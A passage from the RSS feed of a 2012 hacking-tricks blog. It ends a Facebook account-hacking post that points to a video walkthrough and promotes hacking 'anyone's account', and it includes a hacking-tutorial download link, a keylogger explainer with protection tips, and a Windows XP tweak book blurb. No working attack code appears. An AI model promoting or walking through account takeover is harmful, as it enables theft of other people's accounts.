I hope you all like it... If not here is the video of the complete hack in detail with each and every step shown practically.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Note: In video i am using my localhost as web server which in your case will be uraccountname.my3gb.com or other means where you uploaded your files.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Also you must know &lt;b&gt;127.0.0.1&lt;/b&gt; is &lt;b&gt;localhost IP address&lt;/b&gt;. For you case your webhosting will be the IP address that will be used to map against facebook.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Ok now lets &lt;span class="IL_AD" id="IL_AD4"&gt;watch the video&lt;/span&gt;..&lt;br /&gt;
or simply download it&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Right Click on video to view play pause forward controls:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;
&lt;embed align="middle" allowscriptaccess="always" bar_visible="on" height="320" loop="false" menu="true" play="false" pluginspage="http://get.adobe.com/flashplayer/" quality="high" src="http://www.myfreetests.com/Hackingloops/Hack%20Facebook%20Account%20Password.SWF" type="application/x-shockwave-flash" width="560" wmode="window"&gt;&lt;/embed&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;
I hope you all love this tutorial :P you have to... Because its the best method for hacking anyone's account..&lt;/div&gt;
&lt;div style="color: #274e13; font-family: Verdana,sans-serif;"&gt;
&lt;i&gt;&lt;span style="font-size: large;"&gt;At least i can hope this article deserves a big smile on you face with looks of being shocked and a appreciation comment that will make me smile...:D&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDdodzphCnGx616iNOZ6mA7mDvxBbFAIVMHp_5jgZQHJ_1HovpvUHIpnTmw83g2gheEUASBNC_GZs9GLoryCWUPTYL861OGJo1o32Pnoar0VmnVRu5NMZzJaY6EJ23fPWvcq6k2YRhyphenhyphenoMo/s72-c/Hackfacebook.jpeg" width="72"/></item><item><title>1000+ Hacking Tutorials collection</title><link>http://superhackings.blogspot.com/2012/09/1000-hacking-tutorials-collection.html</link><category>ebooks</category><category>Hacking Tools And Programs</category><category>Hacking Tutorials</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Wed, 5 Sep 2012 11:20:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-7276117871530056885</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-8yN2CopWBAg/TvxaFHFWNKI/AAAAAAAAAUM/cXa5wLtKqWA/s320/hacking-tutorials.gif" width="264" /&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://adf.ly/1uegz" target="_blank"&gt;DOWNLOAD HERE&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/-8yN2CopWBAg/TvxaFHFWNKI/AAAAAAAAAUM/cXa5wLtKqWA/s72-c/hacking-tutorials.gif" width="72"/></item><item><title>What is keylogger ?</title><link>http://superhackings.blogspot.com/2012/09/what-is-keylogger.html</link><category>Keylogger</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Wed, 5 Sep 2012 10:38:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-2373616280091982951</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnwCm30cYOFq5lqWvkL9LKebW8dAIAp799W76BIZTVIR15rgnUZWNh4CTaDqWwIr25G3Ce0aHHpncoC_rugAd4yUQyIsawLoBAeMAJ0B2sN1NHCson9xHdQwQElX76UggQbftifVB7hU62/s200/keystroke-logging-spy.jpg" width="230" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&amp;nbsp;&lt;b style="color: #cc0000;"&gt;1. What is keylogger ?&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt;&lt;/span&gt;You might have heard about &lt;span class="IL_AD" id="IL_AD4"&gt;keyloggers&lt;/span&gt; but really dont know what they are reading this article will clear your mind. A &lt;span class="Apple-style-span" style="color: #cc0000;"&gt;keylogger&lt;/span&gt; also know as &lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;span class="IL_AD" id="IL_AD1"&gt;keystroke logger&lt;/span&gt;&lt;/span&gt; is software or &lt;span class="IL_AD" id="IL_AD2"&gt;hardware device&lt;/span&gt; which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your &lt;span class="IL_AD" id="IL_AD10"&gt;computer&lt;/span&gt; since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.&lt;br /&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=2055989097824833615" name="more"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;2. How it can harm you ?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit &lt;span class="IL_AD" id="IL_AD3"&gt;card details&lt;/span&gt; etc.&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;b&gt;Example:&lt;/b&gt;&lt;/span&gt; You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;3. Types of &amp;nbsp;keyloggers&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;There are two types of keylogger &lt;span class="Apple-style-span" style="color: #cc0000;"&gt;hardware keylogger&lt;/span&gt; and&lt;span class="Apple-style-span" style="color: #cc0000;"&gt; software keylogger&lt;/span&gt;. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; HARDWARE KEYLOGGER &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaBBUSXDMSPzMw1ApTMB651tLdxEBTcP8A8nlM0H8tfD-sd2ztEDZeCvlAheTq-V3bAZHz4UKbT3bAe8PqhYvnDqz_fv6RMl-wU7IJekPfAbb1ovZzfpB2zuijQRBdPQppuJvMo79OHevl/s1600/hardware.jpg" /&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b style="text-align: left;"&gt;&amp;nbsp;SOFTWARE KEYLOGGER&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&amp;nbsp;&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiG42V31DbXYpNs_D6CygmguWa99eCp6yYAmozKb1QYuffXl4ppAir7JKksFwWpxDgjque-t9swDzhHgAwaRcWskkQwsgZxq50P5K58y1rHBgjsWn7rGbSvVSNeAw6ZMlE3cyVzD6twlVg/s1600/36005-familyogger.png" /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;4. How to Protect yourself from keyloggers ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Never use your &lt;span class="IL_AD" id="IL_AD5"&gt;online banking&lt;/span&gt; from cyber cafe. If you want to use then you can try this method. &lt;span class="IL_AD" id="IL_AD9"&gt;open notepad&lt;/span&gt; and type anything Then copy and paste each word that comes in your username or password.&lt;/li&gt;
&lt;li&gt;You can even use above method to protect your facebook profile, yahoo or gmail id.&lt;/li&gt;
&lt;li&gt;When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.&lt;strong&gt;FvusygETuUqYy-isemaLDu7puB4&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnwCm30cYOFq5lqWvkL9LKebW8dAIAp799W76BIZTVIR15rgnUZWNh4CTaDqWwIr25G3Ce0aHHpncoC_rugAd4yUQyIsawLoBAeMAJ0B2sN1NHCson9xHdQwQElX76UggQbftifVB7hU62/s72-c/keystroke-logging-spy.jpg" width="72"/></item><item><title>Hacking Windows Xp</title><link>http://superhackings.blogspot.com/2012/09/hacking-windows-xp.html</link><category>Hacking Tools And Programs</category><category>Hacking Tutorials</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Wed, 5 Sep 2012 10:37:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-3226912360322206787</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin-right: 25px;"&gt;
&lt;script src="http://www.stumbleupon.com/hostedbadge.php?s=1&amp;amp;r=http://coolhacking-tricks.blogspot.in/2012/01/hacking-windows-xp.html"&gt;&lt;/script&gt;&lt;su:badge layout="1" location="http://coolhacking-tricks.blogspot.in/2012/01/hacking-windows-xp.html"&gt;&lt;/su:badge&gt; &lt;script type="text/javascript"&gt;   (function() {     var li = document.createElement('script'); li.type = 'text/javascript'; li.async = true;     li.src = window.location.protocol + '//platform.stumbleupon.com/1/widgets.js';     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s);   })(); &lt;/script&gt;&lt;/div&gt;
&lt;div style="margin-right: 5px;"&gt;
&lt;/div&gt;
&lt;script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4de3b2d654f56f28" type="text/javascript"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt; var addthis_config = { ui_cobrand: "COOL HACKING TRICKS", ui_header_color: "#ffffff", ui_header_background: "#0080FF" } &lt;/script&gt;
&lt;br /&gt;



&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Ls5vTOAPDnKWqsvhVUfK1M5GE8Ri-GMFZU-vH5428ugCQfhaMbD3f8vnMjcIeEYt1PTtNWlQrsz9z1HPPO8DBmkleJNKNIAOCcR651e5AXlIC7EN5i5Kk_e6UU5yjlHh2hRwRYesea80/s1600/hacking+win+xp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Ls5vTOAPDnKWqsvhVUfK1M5GE8Ri-GMFZU-vH5428ugCQfhaMbD3f8vnMjcIeEYt1PTtNWlQrsz9z1HPPO8DBmkleJNKNIAOCcR651e5AXlIC7EN5i5Kk_e6UU5yjlHh2hRwRYesea80/s320/hacking+win+xp.jpg" width="246" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;Get ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred style&lt;/li&gt;
&lt;li&gt;Sinchak doesn't waste time tweaking Movie Maker or Instant Messenger-these &lt;span class="IL_AD" id="IL_AD6"&gt;hacks are&lt;/span&gt; heavy-duty, detailed instructions for squeezing every drop of power &lt;span class="IL_AD" id="IL_AD8"&gt;from Windows XP&lt;/span&gt; and maximizing speed, appearance, and security&lt;/li&gt;
&lt;li&gt;Not for the faint of heart! This book is written for users who aren't afraid to &lt;span class="IL_AD" id="IL_AD4"&gt;roll&lt;/span&gt; up their sleeves, risk voiding their &lt;span class="IL_AD" id="IL_AD10"&gt;warranties&lt;/span&gt;, take total control of the task bar, uninstall programs that are supposedly permanent, and beef up boot speed&lt;/li&gt;
&lt;li&gt;Mines gems like unlocking hidden &lt;span class="IL_AD" id="IL_AD11"&gt;settings&lt;/span&gt;, customizing &lt;span class="IL_AD" id="IL_AD1"&gt;boot screens&lt;/span&gt;, supercharging online and program launch speed, maximizing the file system and RAM, and dumping hated features for good&lt;/li&gt;
&lt;li&gt;Written by the creator of TweakXP.com, a site considered Mecca &lt;span class="IL_AD" id="IL_AD9"&gt;for Windows&lt;/span&gt; hackers and trusted by more than ten million Windows XP users worldwide&lt;/li&gt;
&lt;li&gt;Includes a hacker's dream CD-ROM with a set of ready-to-install hacks, theme creation tools, custom boot screens, "undo" files that help the reader tinker with Windows XP's registry, and a whole lot more&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;a href="http://www.megaupload.com/?d=Y68FT4AA" target="_blank"&gt;DOWNLOAD HERE&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5Ls5vTOAPDnKWqsvhVUfK1M5GE8Ri-GMFZU-vH5428ugCQfhaMbD3f8vnMjcIeEYt1PTtNWlQrsz9z1HPPO8DBmkleJNKNIAOCcR651e5AXlIC7EN5i5Kk_e6UU5yjlHh2hRwRYesea80/s72-c/hacking+win+xp.jpg" width="72"/></item></channel></rss>